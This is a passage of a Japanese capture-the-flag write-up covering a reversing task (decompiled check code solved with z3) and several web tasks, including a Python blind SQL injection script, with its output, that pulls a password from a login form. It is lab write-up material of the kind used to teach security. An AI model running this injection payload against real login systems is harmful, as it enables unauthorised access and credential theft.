== -0x52) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((param_1[0x13] ^ param_1[0x3e]) == 6) { uVar1 = 1; } else { if ((param_1[0x36] ^ param_1[0x3e]) == 0x4a) { uVar1 = 1; } else { if ((int)(char)param_1[0x3b] + (int)(char)param_1[0x3e] == 0xb1) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0x3d] - (int)(char)param_1[0xe] == 0x16) { uVar1 = 1; } else { if ((param_1[0x35] ^ param_1[0x3d]) == 0x13) { uVar1 = 1; } else { if ((param_1[0x36] ^ param_1[0x3d]) == 0x52) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0x1b] + (int)(char)param_1[0x3c] == 0xa9) { uVar1 = 1; } else { if ((int)(char)param_1[0x3c] - (int)(char)param_1[0x3b] == 5) { uVar1 = 1; } else { if ((int)(char)param_1[0x3c] - (int)(char)param_1[0x34] == -0x37) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((param_1[7] ^ param_1[0x3b]) == 0xb) { uVar1 = 1; } else { if ((param_1[1] ^ param_1[0x3b]) == 100) { uVar1 = 1; } else { if ((param_1[0x2c] ^ param_1[0x3b]) == 0xf) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0x29] + (int)(char)param_1[0x3a] == 0x70) { uVar1 = 1; } else { if ((int)(char)param_1[0x3a] - (int)(char)param_1[0x15] == -0x2f) { uVar1 = 1; } else { if ((param_1[0x32] ^ param_1[0x3a]) == 0x45) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((param_1[0x25] ^ param_1[0x39]) == 0x33) { uVar1 = 1; } else { if ((int)(char)param_1[0x30] + (int)(char)param_1[0x39] == 0xc6) { uVar1 = 1; } else { if ((int)(char)param_1[0x38] + (int)(char)param_1[0x39] == 0x9e) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0x20] + (int)(char)param_1[0x38] == 0xa3) { uVar1 = 1; } else { if ((param_1[6] ^ param_1[0x38]) == 0x40) { uVar1 = 1; } else { if ((int)(char)param_1[0x26] + (int)(char)param_1[0x38] == 0x9b) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0x37] - (int)(char)param_1[0x2c] == 1) { uVar1 = 1; } else { if ((int)(char)param_1[0xc] + (int)(char)param_1[0x37] == 0x94) { uVar1 = 1; } else { if ((param_1[0x29] ^ param_1[0x37]) == 0xd) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((param_1[0x35] ^ param_1[0x36]) == 0x4e) { uVar1 = 1; } else { if ((int)(char)param_1[0x36] - (int)(char)param_1[0x22] == 0xd) { uVar1 = 1; } else { if (param_1[0x36] == param_1[0x3a]) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } else { if ((int)(char)param_1[0x35] - (int)(char)param_1[0xe] == 0x1d) { uVar1 = 1; } else { if ((int)(char)param_1[0x1e] + (int)(char)param_1[0x35] == 0xb4) { uVar1 = 1; } else { if ((int)(char)param_1[0x35] - (int)(char)param_1[0xb] == 0x49) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0x26] + (int)(char)param_1[0x34] == 0xcd) { uVar1 = 1; } else { if ((int)(char)param_1[0x37] + (int)(char)param_1[0x34] == 0xa3) { uVar1 = 1; } else { if ((int)(char)param_1[0x1b] + (int)(char)param_1[0x34] == 0xe6) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((param_1[1] ^ param_1[0x33]) == 0x60) { uVar1 = 1; } else { if ((int)(char)param_1[0x33] - (int)(char)param_1[0x20] == -0x32) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } else { if ((int)(char)param_1[0x32] - (int)(char)param_1[0xb] == 0x3d) { uVar1 = 1; } else { if ((int)(char)param_1[3] + (int)(char)param_1[0x32] == 0xba) { uVar1 = 1; } else { if ((param_1[0x28] ^ param_1[0x32]) == 0x11) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((param_1[10] ^ param_1[0x31]) == 0xe) { uVar1 = 1; } else { if ((int)(char)param_1[0x23] + (int)(char)param_1[0x31] == 0xa2) { uVar1 = 1; } else { if ((int)(char)param_1[7] + (int)(char)param_1[0x31] == 0x6d) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0x2d] + (int)(char)param_1[0x30] == 0x99) { uVar1 = 1; } else { if ((int)(char)param_1[0x31] + (int)(char)param_1[0x30] == 0x98) { uVar1 = 1; } else { if ((int)(char)param_1[0x13] + (int)(char)param_1[0x30] == 0xd8) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } else { if ((int)(char)param_1[0x26] + (int)(char)param_1[0x2f] == 0xd1) { uVar1 = 1; } else { if ((param_1[9] ^ param_1[0x2f]) == 0xd) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } else { if ((param_1[0x20] ^ param_1[0x2e]) == 0x40) { uVar1 = 1; } else { if ((int)(char)param_1[0xd] + (int)(char)param_1[0x2e] == 0x6c) { uVar1 = 1; } else { if ((param_1[0x2f] ^ param_1[0x2e]) == 0x45) { uVar1 = 1; } else { uVar1 = 1; } } } } } } else { if ((param_1[0x1a] ^ param_1[0x2d]) == 0x5e) { uVar1 = 1; } else { if ((int)(char)param_1[0x1d] + (int)(char)param_1[0x2d] == 0x95) { uVar1 = 1; } else { if ((int)(char)param_1[0x2d] - (int)(char)param_1[0x3a] == 1) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((param_1[0xe] ^ param_1[0x2c]) == 0x50) { uVar1 = 1; } else { if ((param_1[0x16] ^ param_1[0x2c]) == 5) { uVar1 = 1; } else { if ((int)(char)param_1[0x30] + (int)(char)param_1[0x2c] == 0x9d) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0x37] + (int)(char)param_1[0x2b] == 0xac) { uVar1 = 1; } else { if ((int)(char)param_1[0x11] + (int)(char)param_1[0x2b] == 0xed) { uVar1 = 1; } else { if ((int)(char)param_1[0x2b] - (int)(char)param_1[0x2d] == 0x4d) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((param_1[2] ^ param_1[0x2a]) == 0x2b) { uVar1 = 1; } else { if ((param_1[0x3f] ^ param_1[0x2a]) == 0x6e) { uVar1 = 1; } else { if ((int)(char)param_1[0x2a] - (int)(char)param_1[0x27] == 0x36) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0x38] + (int)(char)param_1[0x29] == 0x6c) { uVar1 = 1; } else { if ((int)(char)param_1[0x27] + (int)(char)param_1[0x29] == 0x69) { uVar1 = 1; } else { if ((int)(char)param_1[0x29] - (int)(char)param_1[0x10] == -0x3d) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((param_1[0x2e] ^ param_1[0x28]) == 0x4d) { uVar1 = 1; } else { if ((param_1[0x37] ^ param_1[0x28]) == 0x43) { uVar1 = 1; } else { if ((param_1[0x12] ^ param_1[0x28]) == 0x42) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((param_1[0x12] ^ param_1[0x27]) == 0xb) { uVar1 = 1; } else { if ((int)(char)param_1[0x34] + (int)(char)param_1[0x27] == 0xa7) { uVar1 = 1; } else { if ((int)(char)param_1[0x2a] + (int)(char)param_1[0x27] == 0x98) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0x26] - (int)(char)param_1[0x22] == 0x38) { uVar1 = 1; } else { if ((int)(char)param_1[0x26] - (int)(char)param_1[0x1f] == -0x19) { uVar1 = 1; } else { if ((int)(char)param_1[0x26] - (int)(char)param_1[0x2b] == -0x14) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[6] + (int)(char)param_1[0x25] == 0xd9) { uVar1 = 1; } else { uVar1 = 1; } } } } } } else { if ((int)(char)param_1[0x15] + (int)(char)param_1[0x24] == 0xa2) { uVar1 = 1; } else { if ((int)(char)param_1[0x24] - (int)(char)param_1[0x1a] == -0x2e) { uVar1 = 1; } else { if ((int)(char)param_1[9] + (int)(char)param_1[0x24] == 0x9a) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((param_1[0x2b] ^ param_1[0x23]) == 0x17) { uVar1 = 1; } else { if ((param_1[0x36] ^ param_1[0x23]) == 0x50) { uVar1 = 1; } else { if ((int)(char)param_1[0x23] - (int)(char)param_1[0x30] == 0x17) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0x22] - (int)(char)param_1[0x30] == -0x26) { uVar1 = 1; } else { if ((param_1[0x3b] ^ param_1[0x22]) == 3) { uVar1 = 1; } else { if ((param_1[0x19] ^ param_1[0x22]) == 0x48) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0x11] + (int)(char)param_1[0x21] == 0xdc) { uVar1 = 1; } else { if ((int)(char)param_1[0x15] + (int)(char)param_1[0x21] == 0xd7) { uVar1 = 1; } else { if ((int)(char)param_1[0x17] + (int)(char)param_1[0x21] == 0xe0) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((param_1[0x31] ^ param_1[0x20]) == 0x53) { uVar1 = 1; } else { if ((int)(char)param_1[0x17] + (int)(char)param_1[0x20] == 0xea) { uVar1 = 1; } else { if ((param_1[0xd] ^ param_1[0x20]) == 0x55) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((param_1[0x32] ^ param_1[0x1f]) == 0xe) { uVar1 = 1; } else { if ((int)(char)param_1[0x28] + (int)(char)param_1[0x1f] == 0xf8) { uVar1 = 1; } else { if ((int)(char)param_1[0x21] + (int)(char)param_1[0x1f] == 0xe1) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0x27] + (int)(char)param_1[0x1e] == 0x69) { uVar1 = 1; } else { if ((param_1[8] ^ param_1[0x1e]) == 0x40) { uVar1 = 1; } else { if ((int)(char)param_1[0x1e] - (int)(char)param_1[0x25] == -0x29) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((param_1[0x15] ^ param_1[0x1d]) == 0x29) { uVar1 = 1; } else { if ((int)(char)param_1[0x23] + (int)(char)param_1[0x1d] == 0xd4) { uVar1 = 1; } else { if ((int)(char)param_1[0x1d] - (int)(char)param_1[0xb] == 0x31) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((param_1[0x16] ^ param_1[0x1c]) == 8) { uVar1 = 1; } else { if ((param_1[0x16] ^ param_1[0x1c]) == 9) { uVar1 = 1; } else { if ((int)(char)param_1[0x2c] + (int)(char)param_1[0x1c] == 0x71) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0x1b] - (int)(char)param_1[0x3d] == 0xe) { uVar1 = 1; } else { if ((int)(char)param_1[2] + (int)(char)param_1[0x1b] == 0xbf) { uVar1 = 1; } else { if ((int)(char)param_1[0x3e] + (int)(char)param_1[0x1b] == 0xfc) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((param_1[0x3c] ^ param_1[0x1a]) == 0x53) { uVar1 = 1; } else { if ((int)(char)param_1[0x1a] - (int)(char)param_1[0x33] == 0x34) { uVar1 = 1; } else { if ((int)(char)param_1[0x1a] - (int)(char)param_1[0x24] == 0x37) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } else { if ((param_1[1] ^ param_1[0x19]) == 0x23) { uVar1 = 1; } else { if ((param_1[4] ^ param_1[0x19]) == 0xc) { uVar1 = 1; } else { if ((param_1[0x1f] ^ param_1[0x19]) == 9) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((param_1[7] ^ param_1[0x18]) == 9) { uVar1 = 1; } else { if ((param_1[0x12] ^ param_1[0x18]) == 4) { uVar1 = 1; } else { if ((int)(char)param_1[0x18] - (int)(char)param_1[0x14] == -0x2b) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0x17] - (int)(char)param_1[0x1d] == 0x22) { uVar1 = 1; } else { if ((param_1[0x25] ^ param_1[0x17]) == 0x1e) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } else { if ((int)(char)param_1[0x11] + (int)(char)param_1[0x16] == 0xa5) { uVar1 = 1; } else { if ((int)(char)param_1[0x31] + (int)(char)param_1[0x16] == 0x65) { uVar1 = 1; } else { if ((int)(char)param_1[0x17] + (int)(char)param_1[0x16] == 0xad) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } else { if ((int)(char)param_1[0x15] - (int)(char)param_1[0x12] == 0x44) { uVar1 = 1; } else { if ((int)(char)param_1[0x1e] + (int)(char)param_1[0x15] == 0xad) { uVar1 = 1; } else { if ((int)(char)param_1[0x15] - (int)(char)param_1[0x1d] == 0x12) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0x14] - (int)(char)param_1[0x1e] == 0x34) { uVar1 = 1; } else { if ((int)(char)param_1[9] + (int)(char)param_1[0x14] == 0xbf) { uVar1 = 1; } else { if ((param_1[0x2d] ^ param_1[0x14]) == 0x6a) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0x13] - (int)(char)param_1[5] == 0x42) { uVar1 = 1; } else { if ((int)(char)param_1[0x13] - (int)(char)param_1[0x1c] == 0x48) { uVar1 = 1; } else { if ((param_1[0xf] ^ param_1[0x13]) == 0x4a) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((param_1[6] ^ param_1[0x12]) == 0x5c) { uVar1 = 1; } else { if ((int)(char)param_1[0x12] - (int)(char)param_1[0x23] == -0x31) { uVar1 = 1; } else { if ((int)(char)param_1[0xd] + (int)(char)param_1[0x12] == 0x6e) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0x11] - (int)(char)param_1[0x3c] == 0x41) { uVar1 = 1; } else { if ((int)(char)param_1[0x11] - (int)(char)param_1[7] == 0x3f) { uVar1 = 1; } else { if ((int)(char)param_1[0x17] + (int)(char)param_1[0x11] == 0xea) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[1] + (int)(char)param_1[0x10] == 0xc5) { uVar1 = 1; } else { if ((int)(char)param_1[0x15] + (int)(char)param_1[0x10] == 0xeb) { uVar1 = 1; } else { if ((int)(char)param_1[0x10] - (int)(char)param_1[0x1e] == 0x41) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0x29] + (int)(char)param_1[0xf] == 0x69) { uVar1 = 1; } else { if ((int)(char)param_1[0x17] + (int)(char)param_1[0xf] == 0xb5) { uVar1 = 1; } else { if ((int)(char)param_1[0xf] - (int)(char)param_1[0x33] == 3) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0xe] - (int)(char)param_1[0x31] == 0x34) { uVar1 = 1; } else { if ((int)(char)param_1[0x3d] + (int)(char)param_1[0xe] == 0xcc) { uVar1 = 1; } else { if ((int)(char)param_1[0x17] + (int)(char)param_1[0xe] == 0xd8) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((param_1[0x3a] ^ param_1[0xd]) == 0xd) { uVar1 = 1; } else { if ((int)(char)param_1[0xd] - (int)(char)param_1[0x32] == -0x37) { uVar1 = 1; } else { if ((int)(char)param_1[0xd] - (int)(char)param_1[0x23] == -0x37) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0x32] + (int)(char)param_1[0xc] == 0xcf) { uVar1 = 1; } else { if ((int)(char)param_1[0x27] + (int)(char)param_1[0xc] == 0x95) { uVar1 = 1; } else { if ((int)(char)param_1[0xc] - (int)(char)param_1[0xe] == 4) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } else { if ((int)(char)param_1[0xb] - (int)(char)param_1[0x23] == -0x2d) { uVar1 = 1; } else { if ((int)(char)param_1[0xb] - (int)(char)param_1[0x16] == 10) { uVar1 = 1; } else { if ((int)(char)param_1[0xb] - (int)(char)param_1[0x15] == -0x32) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[10] - (int)(char)param_1[0x3d] == -0x33) { uVar1 = 1; } else { if ((param_1[0x31] ^ param_1[10]) == 0xc) { uVar1 = 1; } else { if ((param_1[0x21] ^ param_1[10]) == 0x5a) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } else { if ((int)(char)param_1[9] - (int)(char)param_1[0xb] == 0x32) { uVar1 = 1; } else { if ((param_1[0x1a] ^ param_1[9]) == 0x33) { uVar1 = 1; } else { if ((int)(char)param_1[9] - (int)(char)param_1[0x2b] == -0x13) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0x35] + (int)(char)param_1[8] == 0xf4) { uVar1 = 1; } else { if ((int)(char)param_1[0x3f] + (int)(char)param_1[8] == 0x86) { uVar1 = 1; } else { if ((int)(char)param_1[8] - (int)(char)param_1[0x2a] == 0x15) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0xb] + (int)(char)param_1[7] == 0x6e) { uVar1 = 1; } else { if ((int)(char)param_1[5] + (int)(char)param_1[7] == 0x72) { uVar1 = 1; } else { if (param_1[7] == param_1[0x3b]) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((param_1[0x38] ^ param_1[6]) == 0x58) { uVar1 = 1; } else { if ((int)(char)param_1[6] - (int)(char)param_1[0x2a] == 0x11) { uVar1 = 1; } else { if ((int)(char)param_1[0x10] + (int)(char)param_1[6] == 0xeb) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } else { if ((param_1[0x1c] ^ param_1[5]) == 0xf) { uVar1 = 1; } else { if ((int)(char)param_1[5] - (int)(char)param_1[0x17] == -0x41) { uVar1 = 1; } else { if ((param_1[0x1c] ^ param_1[5]) == 0xe) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((param_1[0x2a] ^ param_1[4]) == 0x11) { uVar1 = 1; } else { if ((param_1[0x18] ^ param_1[4]) == 0x41) { uVar1 = 1; } else { if ((int)(char)param_1[4] - (int)(char)param_1[5] == 0x4f) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0xc] + (int)(char)param_1[3] == 0xab) { uVar1 = 1; } else { if ((int)(char)param_1[3] - (int)(char)param_1[0x11] == -0x26) { uVar1 = 1; } else { if ((int)(char)param_1[3] - (int)(char)param_1[0x1d] == -0x11) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0x32] + (int)(char)param_1[2] == 0xb8) { uVar1 = 1; } else { if ((int)(char)param_1[6] + (int)(char)param_1[2] == 0xb7) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } else { if ((param_1[0xd] ^ param_1[1]) == 0x74) { uVar1 = 1; } else { if ((int)(char)param_1[1] - (int)(char)param_1[0x1c] == 0x1d) { uVar1 = 1; } else { if ((int)(char)param_1[1] - (int)(char)param_1[10] == 0x1f) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } } else { if ((int)(char)param_1[0x36] + (int)(char)*param_1 == 0x7d) { uVar1 = 1; } else { if ((int)(char)param_1[0x37] + (int)(char)*param_1 == 0x7a) { uVar1 = 1; } else { if ((int)(char)param_1[0x10] + (int)(char)*param_1 == 0xc3) { uVar1 = 1; } else { uVar1 = 1; } } } } } } } return uVar1; }
check関数でuVar1が1にならないルートを探す必要がある。angrで何とか解こうとしたが、コードが悪いのかうまくいかない。別の方法を考え、uVar1=1にならないよう、==の条件のみ取り出し、z3で解く。
from z3 import * flaglen = 0x3f x = [BitVec('x%d' % i, 8) for i in range(flaglen)] s = Solver() s.add(x[0] == 0x46) s.add(x[1] - x[0] == 6) s.add(x[1] ^ x[2] == 0xd) s.add(x[2] ^ x[3] == 6) s.add(x[3] ^ x[4] == 0x3c) s.add(x[4] ^ x[5] == 0x4f) s.add(x[5] ^ x[6] == 0x5a) s.add(x[7] - x[6] == -0x38) s.add(x[7] ^ x[8] == 0x44) s.add(x[9] - x[8] == -0x13) s.add(x[9] ^ x[10] == 0x6e) s.add(x[10] + x[0xb] == 0x66) s.add(x[0xb] + x[0xc] == 0x94) s.add(x[0xd] - x[0xc] == -0x2b) s.add(x[0xd] ^ x[0xe] == 0x6b) s.add(x[0xe] ^ x[0xf] == 0x6a) s.add(x[0xf] ^ x[0x10] == 0x40) s.add(x[0x10] + x[0x11] == 0xe5) s.add(x[0x12] - x[0x11] == -0x3d) s.add(x[0x12] ^ x[0x13] == 0x41) s.add(x[0x13] ^ x[0x14] == 0x2d) s.add(x[0x14] ^ x[0x15] == 0x2f) s.add(x[0x15] ^ x[0x16] == 0x40) s.add(x[0x16] + x[0x17] == 0xa7) s.add(x[0x17] ^ x[0x18] == 0x44) s.add(x[0x18] + x[0x19] == 0xa5) s.add(x[0x1a] - x[0x19] == -0xc) s.add(x[0x1a] + x[0x1b] == 0xdb) s.add(x[0x1b] + x[0x1c] == 0xa6) s.add(x[0x1c] + x[0x1d] == 0x90) s.add(x[0x1e] - x[0x1d] == -0x2a) s.add(x[0x1f] - x[0x1e] == 0x44) s.add(x[0x20] - x[0x1f] == -0xc) s.add(x[0x21] - x[0x20] == -0xb) s.add(x[0x21] + x[0x22] == 0x92) s.add(x[0x23] - x[0x22] == 0x3c) s.add(x[0x24] - x[0x23] == -0x3b) s.add(x[0x25] - x[0x24] == 0x32) s.add(x[0x25] ^ x[0x26] == 0x3c) s.add(x[0x26] + x[0x27] == 0x92) s.add(x[0x27] ^ x[0x28] == 0x4b) s.add(x[0x28] + x[0x29] == 0xab) s.add(x[0x29] ^ x[0x2a] == 0x50) s.add(x[0x2b] - x[0x2a] == 0x12) s.add(x[0x2b] ^ x[0x2c] == 0x42) s.add(x[0x2c] ^ x[0x2d] == 6) s.add(x[0x2d] ^ x[0x2e] == 1) s.add(x[0x2e] + x[0x2f] == 0x9e) s.add(x[0x2f] ^ x[0x30] == 0x31) s.add(x[0x30] ^ x[0x31] == 0x6b) s.add(x[0x32] - x[0x31] == 0x3a) s.add(x[0x33] - x[0x32] == -0x3a) s.add(x[0x33] + x[0x34] == 0xa0) s.add(x[0x35] - x[0x34] == 0xd) s.add(x[0x35] ^ x[0x36] == 0x4c) s.add(x[0x37] - x[0x36] == -4) s.add(x[0x37] + x[0x38] == 0x66) s.add(x[0x38] + x[0x39] == 0x94) s.add(x[0x3a] - x[0x39] == -0x28) s.add(x[0x3b] - x[0x3a] == -7) s.add(x[0x3c] == x[0x3b]) s.add(x[0x3c] + x[0x3d] == 0x9c) s.add(x[0x3e] - x[0x3d] == 0x11) r = s.check() if r == sat: m = s.model() flag = '' for i in range(flaglen): flag += chr(m[x[i]].as_long()) print flag
FLAG{4n6r_15_4_5up3r_p0w3rfu1_5ymb0l1c_3x3cu710n_4n4ly515_700l}
fake (Web)
リンクがたくさん画面にある。HTMLソースを見ると1つの「Link」だけ別のページにリンクしている。
<a href="144c9defac04969c7bfad8efaa8ea194.html" style="display: none;"> <button type="button" class="btn btn-primary">Link</button> </a>
https://fake.web.wanictf.org/144c9defac04969c7bfad8efaa8ea194.htmlにアクセスすると、フラグが書いてあった。
FLAG{wow_y0u_h4ve_3po4ted_th3_7ake}
Wani Request 1 (Web)
あどみんちゃんに送信したURLにアクセスしてもらい、フラグに関する情報を探す。RequestBinのURLを送信し、RequestBin側で通信の情報を見る。
Host: requestbin.net
Connection: close
Accept-Encoding: gzip
Cf-Ipcountry: JP
X-Forwarded-For: 13.230.177.250, 103.22.201.210
Cf-Ray: 647e6012abf4efb6-NRT
X-Forwarded-Proto: http
Cf-Visitor: {"scheme":"https"}
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/81.0.4044.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://w4ni-secre7-h1mitu-pa6e.s3-website-ap-northeast-1.amazonaws.com/?url=http://requestbin.net/r/4zb3b7gq
Accept-Language: en-US
Cf-Connecting-Ip: 13.230.177.250
Cdn-Loop: cloudflare
Cf-Request-Id: 09c2da5fa60000efb66482d000000001
X-Request-Id: ae05c014-3ba3-469a-9401-01dcbd6bcabe
X-Forwarded-Port: 80
Via: 1.1 vegur
Connect-Time: 0
X-Request-Start: 1619760597383
Total-Route-Time: 0RefererのURL http://w4ni-secre7-h1mitu-pa6e.s3-website-ap-northeast-1.amazonaws.com/ にアクセスすると、フラグが書いてあった。
FLAG{h77p_r3f3r3r_15_54f3_42a2cc2f275}
watch animal (Web)
wanictf21spring@gmail.comのメアドの人のパスワードがフラグとのことで、Blind SQL Injectionでパスワードを求める。
import requests url = 'https://watch.web.wanictf.org/' passlen = -1 for i in range(1, 33): payload = {"email": "wanictf21spring@gmail.com", "password": "' or (SELECT length(password) FROM users WHERE id = 1) = " + str(i) + " -- -"} r = requests.post(url, data=payload) if 'Login Failed' not in r.text: passlen = i break print '[+] Password Length is:', passlen flag = '' for i in range(1, passlen + 1): for code in range(33, 127): payload = {"email": "wanictf21spring@gmail.com", "password": "' or substr((SELECT password FROM users WHERE id = 1)," + str(i) + ",1)='" + chr(code) + "' -- -"} r = requests.post(url, data=payload) if 'Login Failed' not in r.text: flag += chr(code) break print '[+] flag:', flag print '[*] flag:', flag
実行結果は以下の通り。
[+] Password Length is: 15
[+] flag: F
[+] flag: FL
[+] flag: FLA
[+] flag: FLAG
[+] flag: FLAG{
[+] flag: FLAG{b
[+] flag: FLAG{bl
[+] flag: FLAG{bl1
[+] flag: FLAG{bl1n
[+] flag: FLAG{bl1nd
[+] flag: FLAG{bl1ndS
[+] flag: FLAG{bl1ndSQ
[+] flag: FLAG{bl1ndSQL
[+] flag: FLAG{bl1ndSQLi
[+] flag: FLAG{bl1ndSQLi}
[*] flag: FLAG{bl1ndSQLi}
FLAG{bl1ndSQLi}
